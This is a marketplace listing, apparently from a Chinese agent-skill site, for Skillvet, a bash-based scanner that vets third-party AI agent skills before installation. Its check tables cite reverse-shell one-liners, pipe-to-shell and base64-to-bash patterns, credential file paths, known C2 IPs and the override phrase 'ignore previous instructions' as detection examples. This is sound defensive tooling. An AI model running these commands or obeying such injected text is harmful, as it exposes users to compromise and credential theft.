跳至主要内容
小龙虾小龙虾AI
🤖

Skillvet

Security scanner for ClawHub/community skills — detects malware, credential theft, exfiltration, prompt injection, obfuscation, homograph attacks, ANSI injec...

下载3.9k
星标6
版本2.0.9
安全合规
安全通过

技能说明


name: skillvet description: "Security scanner for ClawHub/community skills — detects malware, credential theft, exfiltration, prompt injection, obfuscation, homograph attacks, ANSI injection, campaign-specific attack patterns, and more before you install. Use when installing skills from ClawHub or any public marketplace, reviewing third-party agent skills for safety, or vetting untrusted code before giving it to your AI agent. Triggers: install skill, audit skill, check skill, vet skill, skill security, safe install, is this skill safe." compatibility: "Requires bash, grep, find, and file (standard POSIX). safe-install.sh and scan-remote.sh require the clawdhub CLI. perl or ggrep (Homebrew GNU grep) recommended for full Unicode regex support on macOS." metadata: version: "2.0.9" author: oakencore

Skillvet

Security scanner for agent skills. 48 critical checks, 8 warning checks. No dependencies — just bash and grep. Includes Tirith-inspired detection patterns, campaign signatures from Koi Security, Bitdefender, Snyk, and 1Password ClickFix patterns.

Usage

Safe install (installs, audits, auto-removes if critical):

bash skills/skillvet/scripts/safe-install.sh <skill-slug>

Audit an existing skill:

bash skills/skillvet/scripts/skill-audit.sh skills/some-skill

Audit all installed skills:

for d in skills/*/; do bash skills/skillvet/scripts/skill-audit.sh "$d"; done

JSON output (for automation):

bash skills/skillvet/scripts/skill-audit.sh --json skills/some-skill

SARIF output (for GitHub Code Scanning / VS Code):

bash skills/skillvet/scripts/skill-audit.sh --sarif skills/some-skill

Summary mode (one-line per skill):

bash skills/skillvet/scripts/skill-audit.sh --summary skills/some-skill

Verbose mode (debug which checks run and what files are scanned):

bash skills/skillvet/scripts/skill-audit.sh --verbose skills/some-skill

Scan remote skill without installing:

bash skills/skillvet/scripts/scan-remote.sh <skill-slug>

Diff scan (only scan what changed between versions):

bash skills/skillvet/scripts/diff-scan.sh path/to/old-version path/to/new-version

Exit codes: 0 clean, 1 warnings only, 2 critical findings.

Advanced Options

FlagDescription
--jsonJSON output for CI/dashboards
--sarifSARIF v2.1.0 output for GitHub Code Scanning
--summaryOne-line output per skill
--verboseShow which checks run and which files are scanned
--exclude-selfSkip scan when scanning own source directory
--max-file-size NSkip files larger than N bytes
--max-depth NLimit directory traversal depth

Suppressing False Positives

Create a .skillvetrc file in the skill directory to disable specific checks:

# Disable check #4 (obfuscation) and #20 (shortened URLs)
disable:4
disable:20

Or add inline comments to suppress individual lines:

const url = "https://bit.ly/legit-link"; // skillvet-ignore

Pre-commit Hook

Install the git pre-commit hook to auto-scan skills before committing:

ln -sf ../../scripts/pre-commit-hook .git/hooks/pre-commit

Risk Scoring

Each finding has a severity weight (1-10). The aggregate risk score is included in JSON, SARIF, and summary output. Higher scores indicate more dangerous patterns:

  • 10: Reverse shells, known C2 IPs
  • 9: Data exfiltration, pipe-to-shell, persistence + network, ClickFix, base64 execution
  • 7-8: Credential theft, obfuscation, path traversal, time bombs
  • 4-6: Punycode, homographs, ANSI injection, shortened URLs
  • 2-3: Subprocess execution, network requests, file writes

Critical Checks (auto-blocked)

Core Security Checks (1-24)

#CheckExample
1Known exfiltration endpointswebhook.site, ngrok.io, requestbin
2Bulk env variable harvestingprintenv |, ${!*@}
3Foreign credential accessANTHROPIC_API_KEY, TELEGRAM_BOT_TOKEN in scripts
4Code obfuscationbase64 decode, hex escapes, dynamic code generation
5Path traversal / sensitive files../../, ~/.ssh, ~/.clawdbot
6Data exfiltration via curl/wgetcurl --data, wget --post with variables
7Reverse/bind shells/dev/tcp/, nc -e, socat
8.env file theftdotenv loading in scripts (not docs)
9Prompt injection in markdown"ignore previous instructions" in SKILL.md
10LLM tool exploitationInstructions to send/email secrets
11Agent config tamperingWrite/modify AGENTS.md, SOUL.md, clawdbot.json
12Unicode obfuscationZero-width chars, RTL override, bidi control chars
13Suspicious setup commandscurl piped to bash in SKILL.md
14Social engineeringDownload external binaries, paste-and-run instructions
15Shipped .env files.env files (not .example) in the skill
16Homograph URLs (Tirith)Cyrillic i vs Latin i in hostnames
17ANSI escape sequences (Tirith)Terminal escape codes in code/data files
18Punycode domains (Tirith)xn-- prefixed IDN-encoded domains
19Double-encoded paths (Tirith)%25XX percent-encoding bypass
20Shortened URLs (Tirith)bit.ly, t.co, tinyurl.com hiding destinations
21Pipe-to-shellcurl | bash (HTTP and HTTPS)
22String construction evasionString.fromCharCode, getattr, dynamic call assembly
23Data flow chain analysisSame file reads secrets, encodes, AND sends network requests
24Time bomb detectionDate.now() > timestamp, setTimeout(fn, 86400000)
25Known C2/IOC IP blocklist91.92.242.30, 54.91.154.110 (known AMOS C2 servers)
26Password-protected archives"extract using password: openclaw" — AV evasion
27Paste service payloadsglot.io, pastebin.com hosting malicious scripts
28GitHub releases binary downloadsFake prerequisites pointing to .zip/.exe on GitHub
29Base64 pipe-to-interpreterecho '...' | base64 -D | bash — primary macOS vector
30Subprocess + network commandshidden pipe-to-shell in Python/JS code
31Fake URL misdirection (warning)decoy URL before real payload
32Process persistence + networknohup curl ... & — backdoor with network access
33Fake prerequisite pattern"Prerequisites" section with sketchy external downloads
34xattr/chmod droppermacOS Gatekeeper bypass: download, xattr -c, chmod +x, execute
35ClickFix download+execute chaincurl -o /tmp/x && chmod +x && ./x, open -a with downloads
36Suspicious package sourcespip install git+https://..., npm from non-official registries
37Staged installer patternFake dependency names like openclaw-core, some-lib
38Fake OS update social engineering"Apple Software Update required for compatibility"
39Known malicious ClawHub actorszaycv, Ddoy233, Sakaen736jih, Hightower6eu references
40Bash /dev/tcp reverse shellbash -i >/dev/tcp/IP/PORT 0>&1 (AuthTool pattern)
41Nohup backdoornohup bash -c '...' >/dev/null with network commands
42Python reverse shellsocket.connect + dup2, pty.spawn('/bin/bash')
43Terminal output disguiseDecoy "downloading..." message before malicious payload
44Credential file accessDirect reads of .env, .pem, .aws/credentials
45TMPDIR payload stagingAMOS pattern: drop malware to $TMPDIR then execute
46GitHub raw content executioncurl raw.githubusercontent.com/... | bash
47Echo-encoded payloadsLong base64 strings echoed and piped to decoders
48Typosquat skill namesclawdhub-helper, openclaw-cli, skillvet1

Warning Checks (flagged for review)

#CheckExample
W1Unknown external tool requirementsNon-standard CLI tools in install instructions
W2Subprocess executionchild_process, execSync, spawn, subprocess
W3Network requestsaxios, fetch, requests imports
W4Minified/bundled filesFirst line >500 chars — can't audit
W5Filesystem write operationswriteFile, open('w'), fs.append
W6Insecure transportcurl -k, verify=False — TLS disabled
W7Docker untrusted registriesNon-standard image sources

Scanned File Types

.md, .js, .ts, .tsx, .jsx, .py, .sh, .bash, .rs, .go, .rb, .c, .cpp, .json, .yaml, .yml, .toml, .txt, .env*, Dockerfile*, Makefile, pom.xml, .gradle.

Binary files are automatically skipped. Symlinks are followed.

Portability

Works on Linux and macOS. Unicode checks (#12, #16, #17) use grep -P where available, falling back to perl on systems without Perl-compatible regex (e.g., stock macOS). If neither is available, those checks are silently skipped.

IOC Updates

The C2 IP blocklist in check #25 is based on known indicators from:

To update IOCs, edit the KNOWN_IPS entry in scripts/patterns.b64 (base64-encoded regex pattern).

CI/CD Integration

GitHub Actions

A .github/workflows/test.yml is included — runs the test suite on both Ubuntu and macOS on push/PR.

GitHub Code Scanning (SARIF)

- name: Run skillvet
  run: bash scripts/skill-audit.sh --sarif skills/some-skill > results.sarif || true

- name: Upload SARIF
  uses: github/codeql-action/upload-sarif@v3
  with:
    sarif_file: results.sarif

Limitations

Static analysis only. English-centric prompt injection patterns. Minified JS is flagged but not deobfuscated. A clean scan raises the bar but doesn't guarantee safety.

The scanner flags itself when audited — its own patterns contain the strings it detects. Use --exclude-self to skip self-scanning in CI.

如何使用「Skillvet」?

  1. 打开小龙虾AI(Web 或 iOS App)
  2. 点击上方「立即使用」按钮,或在对话框中输入任务描述
  3. 小龙虾AI 会自动匹配并调用「Skillvet技能完成任务
  4. 结果即时呈现,支持继续对话优化

相关技能